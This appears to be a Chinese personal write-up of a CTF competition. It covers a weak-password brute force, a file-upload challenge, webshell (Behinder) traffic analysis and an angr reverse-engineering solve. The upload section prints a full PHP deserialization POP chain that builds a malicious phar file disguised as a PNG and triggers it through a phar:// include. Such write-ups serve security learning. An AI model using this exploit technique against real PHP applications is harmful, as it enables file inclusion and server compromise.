bili_22_1024

今年比往年难,可见的,去年抄答案混分,说今年必然会做

只做了三道题,菜

  • ezinvader

    js文件里头有个颜文字,解出来有个post,直接跑密码,提示了8个星号,8位弱密码

    Aa123456,在响应头里,

    其实我自己没跑出来???

    问得别人密码,原来重置一下sessenid就行了

  • up

    文件上传

    <?php

// flag in /tmp/flag.php 


class Modifier {

    public function __invoke(){
        include("index.php");
    }
}

class Action {
    public $checkAccess='index.php';
    public $id='0a';

    public function run()
    {  
        if(strpos($this->checkAccess, 'upload') !== false){ 
            echo "error path";
            exit();
        } 

        if ($this->id !== 0 && $this->id !== 1) {
            switch($this->id) {
                case 0:
                    if ($this->checkAccess) {
                        include($this->checkAccess);
                    }
                    break;
                case 1:
                    throw new Exception("id invalid in ".__CLASS__.__FUNCTION__);
                    break;
                default:
                    break;         
            }
        }
    }

}

class Content {

    public $formatters;

    public function getFormatter($formatter)//close
    {
        echo $formatter,'-----';
        if (isset($this->formatters[$formatter])) {
            echo '222222222222';
            return $this->formatters[$formatter];
        }

        foreach ($this->providers as $provider) {
            if (method_exists($provider, $formatter)) {
                $this->formatters[$formatter] = array($provider, $formatter);
                return $this->formatters[$formatter];
            }
        }
        throw new \InvalidArgumentException(sprintf('Unknown formatter "%s"', $formatter));
    }

    public function __call($name, $arguments)
    {
        $a=$this->getFormatter($name);
        echo $a;
        return call_user_func_array($a, $arguments);
    }
}

class Show{
    public $source;
    public $str;
    public $reader;
    public function __construct($file='index.php') {
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString() {
        echo 'string--------';
        $this->str->reset();
        return '';
    }

    public function __wakeup() {

        if(preg_match("/gopher|phar|http|file|ftp|dict|\.\./i", $this->source)) {
            throw new Exception('invalid protocol found in '.__CLASS__);
            echo '111111111111111111';
        }
    }

    public function reset() {

        if ($this->reader !== null) {
            echo 'reset----'; 
            $this->reader->close();
        }
    }
}
$a=new Show();
$a->str='1';
$b=new Show;
$b->reader='1';

$d=new Content;
$d->formatters['close']=array(new Action,'run');

$a->reader=$d;
$b->str=$a;


$c=new Show($b);
$c->str='1';
$c->reader='1';


// $a='O:4:"Show":3:{s:6:"source";O:4:"Show":3:{s:6:"source";s:9:"index.php";s:3:"str";O:4:"Show":3:{s:6:"source";s:9:"index.php";s:3:"str";s:1:"1";s:6:"reader";O:7:"Content":1:{s:10:"formatters";a:1:{s:5:"close";a:2:{i:0;O:6:"Action":2:{s:11:"checkAccess";s:9:"index.php";s:2:"id";s:2:"0a";}i:1;s:3:"run";}}}}s:6:"reader";s:1:"1";}s:3:"str";s:1:"1";s:6:"reader";s:1:"1";}';
// unserialize($a)


//show  _construct  _tostring  reset   content  _call  close  ,$this->formatters【'close'】 = 【new Action(), 'run'】


$phar=new phar('test.phar');
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER();?>");
$phar->setMetadata($c);
$phar->addFromString("flag.txt","flag");
$phar->stopBuffering();

?>

    改了后缀png,上传上去,触发

    c=phar://xxx.png

  • 流量分析

    筛一下http,以前我没做过流量分析,看了提示,说是冰蝎流量,根据冰蝎流量的特征xor,解出flag

  • ezRe

    这是第六题

    菜死了,非预期解,完赛看得wp

    import angr 
proj = angr.Project("../../EzRe") 
simgr = proj.factory.simgr()
simgr.explore(find=lambda s: b"welcome" in s.posix.dumps(1)) 
print(simgr.found[0].posix.dumps(0))